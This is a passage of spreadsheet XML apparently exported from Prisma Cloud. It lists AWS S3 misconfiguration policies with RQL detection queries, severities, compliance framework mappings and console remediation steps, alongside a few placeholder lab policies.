        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2073" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2073" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2073" t="inlineStr"/>
      <c r="R2073" t="inlineStr"/>
      <c r="S2073" t="inlineStr"/>
      <c r="T2073" t="b">
        <v>0</v>
      </c>
      <c r="U2073" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2073" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2073" t="inlineStr">
        <is>
          <t>Pramm-s3-bucket-foo</t>
        </is>
      </c>
      <c r="X2073" t="inlineStr"/>
      <c r="Y2073" t="inlineStr"/>
      <c r="Z2073" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = accountId does not contain "foo"</t>
        </is>
      </c>
      <c r="AA2073" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2073" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2073" t="inlineStr"/>
      <c r="AD2073" t="b">
        <v>0</v>
      </c>
      <c r="AE2073" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2073" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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Pramm-s3-bucket-foo-alert-rule - Notifications:, AccountGroups:avega-active-directory,Default Account Group,Pramm-XSIAM,Testing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73" t="inlineStr">
        <is>
          <t>8dbe9151-d3ff-4637-8ae5-bdb5fe1efa11</t>
        </is>
      </c>
      <c r="AI2073" t="inlineStr">
        <is>
          <t>066971ce-0eaa-4416-813c-92444f8d9abd</t>
        </is>
      </c>
      <c r="AJ2073" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2073" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2074">
      <c r="A2074" t="inlineStr"/>
      <c r="B2074" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2074" s="2" t="inlineStr"/>
      <c r="D2074" t="n">
        <v>4</v>
      </c>
      <c r="E2074" t="n">
        <v>309</v>
      </c>
      <c r="F2074" t="n">
        <v>0</v>
      </c>
      <c r="G2074" t="b">
        <v>1</v>
      </c>
      <c r="H207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74" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2074" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2074" t="inlineStr">
        <is>
          <t>Pramm-s3-bucket-foo-new</t>
        </is>
      </c>
      <c r="L2074" t="inlineStr"/>
      <c r="M2074" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2074" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2074" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2074" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2074" t="inlineStr"/>
      <c r="R2074" t="inlineStr"/>
      <c r="S2074" t="inlineStr">
        <is>
          <t>Pramm</t>
        </is>
      </c>
      <c r="T2074" t="b">
        <v>0</v>
      </c>
      <c r="U2074" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2074" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2074" t="inlineStr"/>
      <c r="X2074" t="inlineStr"/>
      <c r="Y2074" t="inlineStr"/>
      <c r="Z2074" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND cloud.region NOT IN ( 'AWS Tokyo' ) AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = accountId does not contain "foo"</t>
        </is>
      </c>
      <c r="AA2074" t="inlineStr">
        <is>
          <t>Pramod Dhamenia</t>
        </is>
      </c>
      <c r="AB2074" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2074" t="inlineStr"/>
      <c r="AD2074" t="b">
        <v>0</v>
      </c>
      <c r="AE2074" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2074" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG207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74" t="inlineStr">
        <is>
          <t>d74392bf-4d60-475c-a7f5-70f4b3398c45</t>
        </is>
      </c>
      <c r="AI2074" t="inlineStr">
        <is>
          <t>905561d7-e635-414a-8230-973cad9256c3</t>
        </is>
      </c>
      <c r="AJ2074" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2074" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2075">
      <c r="A2075" t="inlineStr">
        <is>
          <t>Demo_Daryl ACSC Information Security Manual (ISM)</t>
        </is>
      </c>
      <c r="B2075" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2075" s="2" t="inlineStr"/>
      <c r="D2075" t="inlineStr"/>
      <c r="E2075" t="inlineStr"/>
      <c r="F2075" t="inlineStr"/>
      <c r="G2075" t="b">
        <v>0</v>
      </c>
      <c r="H20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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2075" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2075" t="inlineStr">
        <is>
          <t>bpachauli copy of s3 bucket is not encrypted</t>
        </is>
      </c>
      <c r="L2075" t="inlineStr"/>
      <c r="M2075" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2075" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2075" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2075" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2075" t="inlineStr">
        <is>
          <t>Demo_ Daryl TEST</t>
        </is>
      </c>
      <c r="R2075" t="inlineStr">
        <is>
          <t>MFA</t>
        </is>
      </c>
      <c r="S2075" t="inlineStr">
        <is>
          <t>PCI DSS v3.2,CIS</t>
        </is>
      </c>
      <c r="T2075" t="b">
        <v>0</v>
      </c>
      <c r="U2075" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2075" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2075" t="inlineStr">
        <is>
          <t>s3 bucket is not encrypted</t>
        </is>
      </c>
      <c r="X2075" t="inlineStr"/>
      <c r="Y2075" t="inlineStr"/>
      <c r="Z2075" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND cloud.service = 'Amazon S3' AND finding.type = 'AWS Inspector Security Best Practices' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = denyUnencryptedUploadsPolicies[*] exists</t>
        </is>
      </c>
      <c r="AA2075" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2075" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2075" t="inlineStr"/>
      <c r="AD2075" t="b">
        <v>0</v>
      </c>
      <c r="AE2075" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2075" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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5" t="inlineStr">
        <is>
          <t>b2a220a7-08b7-4b80-b4fe-8ef58f98cefc</t>
        </is>
      </c>
      <c r="AI2075" t="inlineStr">
        <is>
          <t>75c21e2f-b09a-4551-8f66-12b17dac9b68</t>
        </is>
      </c>
      <c r="AJ2075" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2075" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2076">
      <c r="A2076" t="inlineStr"/>
      <c r="B2076" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2076" s="2" t="inlineStr"/>
      <c r="D2076" t="inlineStr"/>
      <c r="E2076" t="inlineStr"/>
      <c r="F2076" t="inlineStr"/>
      <c r="G2076" t="b">
        <v>0</v>
      </c>
      <c r="H20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76" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2076" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2076" t="inlineStr">
        <is>
          <t>dsdsdsdsd</t>
        </is>
      </c>
      <c r="L2076" t="inlineStr"/>
      <c r="M2076" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2076" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2076" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2076" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2076" t="inlineStr"/>
      <c r="R2076" t="inlineStr"/>
      <c r="S2076" t="inlineStr"/>
      <c r="T2076" t="b">
        <v>0</v>
      </c>
      <c r="U2076" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2076" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2076" t="inlineStr"/>
      <c r="X2076" t="inlineStr"/>
      <c r="Y2076" t="inlineStr"/>
      <c r="Z2076" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-s3api-get-bucket-acl' AND json.rule = accountId exists</t>
        </is>
      </c>
      <c r="AA2076" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB2076" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2076" t="inlineStr"/>
      <c r="AD2076" t="b">
        <v>0</v>
      </c>
      <c r="AE2076" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2076" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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76" t="inlineStr">
        <is>
          <t>1529f2ca-949d-48d9-8531-80da869aecff</t>
        </is>
      </c>
      <c r="AI2076" t="inlineStr">
        <is>
          <t>dec1f630-65eb-4e93-9f6f-a09a20b22c93</t>
        </is>
      </c>
      <c r="AJ2076" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2076" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2077">
      <c r="A2077" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, APRA (CPS 234) Information Security, ISO 27002:2022, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Fedramp (Moderate), ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Matt's ATT&amp;ACK, NIST CSF, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, MITRE ATT&amp;CK v12, ISO/IEC 27002:2013, ISO 27002:2022, ISO/IEC 27002:2013, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Sarbanes Oxley Act (SOX), CDC NIST 800-53 Rev4, PCI DSS v3.2.1, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, ISO/IEC 27017:2015, CSA CCM v.4.0.1, MLPS 2.0 (Level 3), SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, MLPS 2.0, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, NIST 800-53 Rev4, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, CCPA 2018, PIPEDA, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, AWS Well-Architected Framework, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2077" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2077" s="2" t="inlineStr"/>
      <c r="D2077" t="inlineStr"/>
      <c r="E2077" t="inlineStr"/>
      <c r="F2077" t="inlineStr"/>
      <c r="G2077" t="b">
        <v>1</v>
      </c>
      <c r="H20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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2077" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2077" t="inlineStr">
        <is>
          <t>AWS S3 bucket has global view ACL permissions enabled</t>
        </is>
      </c>
      <c r="L2077" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2077" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2077" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2077" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2077" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2077" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2077" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2077" t="inlineStr"/>
      <c r="T2077" t="b">
        <v>0</v>
      </c>
      <c r="U2077" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2077" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2077" t="inlineStr">
        <is>
          <t>This policy determines if any S3 bucket(s) has Global View ACL permissions enabled for the All Users group. These permissions allow external resources to see the permission settings associated to the object.</t>
        </is>
      </c>
      <c r="X2077" t="inlineStr">
        <is>
          <t>1. Go to the AWS console S3 dashboard.
2. Select your bucket by clicking on the bucket name.
3. Select the Permissions tab and 'Access Control List.'
4. Under Public Access, select Everyone.
5. In the popup window, under Access to this bucket's ACL, uncheck 'Read bucket permissions' and Save.</t>
        </is>
      </c>
      <c r="Y2077" t="inlineStr"/>
      <c r="Z2077" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = "acl.grantsAsList[?(@.grantee=='AllUsers')].permission contains ReadAcp or acl.grantsAsList[?(@.grantee=='AllUsers')].permission contains FullControl"</t>
        </is>
      </c>
      <c r="AA2077" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2077" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2077" t="inlineStr">
        <is>
          <t>PC-AWS-S3-251</t>
        </is>
      </c>
      <c r="AD2077" t="b">
        <v>1</v>
      </c>
      <c r="AE2077" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2077" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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7" t="inlineStr">
        <is>
          <t>43c42760-5283-4bc4-ac43-a80e58c4139f</t>
        </is>
      </c>
      <c r="AI2077" t="inlineStr">
        <is>
          <t>50bb0789-ec44-4b33-b409-43d6c6ea49af</t>
        </is>
      </c>
      <c r="AJ2077" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2077" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2078">
      <c r="A2078" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, ISO 27002:2022, HIPAA, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, RBI Baseline Cyber Security and Resilience Requirements, Demo_Daryl ACSC Information Security Manual (ISM), RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Matt's ATT&amp;ACK, NIST CSF, MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), NIST 800-53 Rev 5, MITRE ATT&amp;CK v12, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, ISO 27002:2022, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS Controls v8.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, HIPAA, ISO/IEC 27018:2019, kashan ACSC Information Security Manual (ISM), CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, CIS Controls v7.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CHC HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), PCI DSS v4.0, Secure Controls Framework (SCF) - 2024.2, PCI DSS v3.2.1, Copy of CIS Controls v8, CRI Profile v1.2.1, Risk Management in Technology (RMiT), CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, ISO/IEC 27002:2013, SOC 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, SOC 2, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, CSA CCM v.4.0.1, HITRUST CSF v.11.2.0, NIST SP 800-172, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, TX-RAMP Level 1, ISO 27002:2022, Copy of CIS Controls v8, ISO/IEC 27018:2019, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, Demo_Daryl ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs)</t>
        </is>
      </c>
      <c r="B2078" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2078" s="2" t="inlineStr"/>
      <c r="D2078" t="inlineStr"/>
      <c r="E2078" t="inlineStr"/>
      <c r="F2078" t="inlineStr"/>
      <c r="G2078" t="b">
        <v>1</v>
      </c>
      <c r="H20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78" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2078" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2078" t="inlineStr">
        <is>
          <t>AWS S3 bucket having policy overly permissive to VPC endpoints</t>
        </is>
      </c>
      <c r="L2078" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2078" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2078" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2078" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2078" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2078" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2078" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2078" t="inlineStr"/>
      <c r="T2078" t="b">
        <v>0</v>
      </c>
      <c r="U2078" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2078" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2078" t="inlineStr">
        <is>
          <t>This policy identifies S3 buckets that have the bucket policy overly permissive to VPC endpoints. It is recommended to follow the principle of least privileges ensuring that the VPC endpoints have only necessary permissions instead of full permission on S3 operations.
NOTE: When applying the Amazon S3 bucket policies for VPC endpoints described in this section, you might block your access to the bucket without intending to do so. Bucket permissions that are intended to specifically limit bucket access to connections originating from your VPC endpoint can block all connections to the bucket. The policy might disable console access to the specified bucket because console requests don't originate from the specified VPC endpoint. So remediation should be done very carefully.
For details refer https://docs.aws.amazon.com/AmazonS3/latest/dev/example-bucket-policies-vpc-endpoint.html</t>
        </is>
      </c>
      <c r="X2078" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Navigate to the S3 dashboard
3. Choose the reported S3 bucket
4. In the 'Permissions' tab, click on the 'Bucket Policy'
5. Update the S3 bucket policy for the VPC endpoint so that it has only required permissions instead of full S3 permission.
Refer for example: https://docs.aws.amazon.com/AmazonS3/latest/dev/example-bucket-policies-vpc-endpoint.html</t>
        </is>
      </c>
      <c r="Y2078" t="inlineStr"/>
      <c r="Z2078" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name='aws-s3api-get-bucket-acl' AND json.rule = 'policy.Statement[?any((Condition.StringNotEquals contains aws:SourceVpce and Effect equals Deny and (Action contains s3:* or Action[*] contains s3:*)) or (Condition.StringEquals contains aws:SourceVpce and Effect equals Allow and (Action contains s3:* or Action[*] contains s3:*)))] exists'</t>
        </is>
      </c>
      <c r="AA2078" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2078" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2078" t="inlineStr">
        <is>
          <t>PC-AWS-S3-570</t>
        </is>
      </c>
      <c r="AD2078" t="b">
        <v>1</v>
      </c>
      <c r="AE2078" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2078" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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78" t="inlineStr">
        <is>
          <t>6d783c42-98e1-4d0a-a521-1286535f05a4</t>
        </is>
      </c>
      <c r="AI2078" t="inlineStr">
        <is>
          <t>35c81cee-3906-4f19-92b5-364562dd3ab1</t>
        </is>
      </c>
      <c r="AJ2078" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2078" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2079">
      <c r="A2079" t="inlineStr"/>
      <c r="B2079" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2079" s="2" t="inlineStr"/>
      <c r="D2079" t="inlineStr"/>
      <c r="E2079" t="inlineStr"/>
      <c r="F2079" t="inlineStr"/>
      <c r="G2079" t="b">
        <v>1</v>
      </c>
      <c r="H20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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2079" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2079" t="inlineStr">
        <is>
          <t>AI data exposure risk due to publicly readable S3 bucket used for SageMaker training jobs</t>
        </is>
      </c>
      <c r="L2079" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2079" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2079" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2079" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2079" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2079" t="inlineStr"/>
      <c r="R2079" t="inlineStr"/>
      <c r="S2079" t="inlineStr"/>
      <c r="T2079" t="b">
        <v>0</v>
      </c>
      <c r="U2079" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2079" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2079" t="inlineStr">
        <is>
          <t>This policy identifies the potential data exposure risk due to AWS S3 buckets used for AWS SageMaker training job data inputs being publicly readable.
AWS SageMaker relies on S3 buckets to store the datasets required for training machine learning models. When these buckets have public access permissions, it creates a significant risk of unauthorized access, leading to data breaches and the potential loss of sensitive information. Publicly readable S3 buckets can expose critical datasets to malicious actors, resulting in compromised model integrity and privacy violations.
Immediate action is necessary to secure the identified S3 buckets by enforcing stricter access controls and eliminating public read permissions for the reported S3 bucket used for AWS SageMaker training job data input.</t>
        </is>
      </c>
      <c r="X2079"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GET/LIST objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific GET/LIST functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.</t>
        </is>
      </c>
      <c r="Y2079" t="inlineStr"/>
      <c r="Z2079" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket publicly readable','AWS S3 bucket is utilized for AWS Sagemaker training job data')</t>
        </is>
      </c>
      <c r="AA2079" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2079" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:45</t>
        </is>
      </c>
      <c r="AC2079" t="inlineStr"/>
      <c r="AD2079" t="b">
        <v>1</v>
      </c>
      <c r="AE2079" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2079" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG20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79" t="inlineStr">
        <is>
          <t>08b8e2a7-5672-408b-b368-ce3f44dc5e79</t>
        </is>
      </c>
      <c r="AI2079" t="inlineStr">
        <is>
          <t>b890a234-6872-4142-859e-8213fcf8c215</t>
        </is>
      </c>
      <c r="AJ2079" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2079" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2080">
      <c r="A2080" t="inlineStr">
        <is>
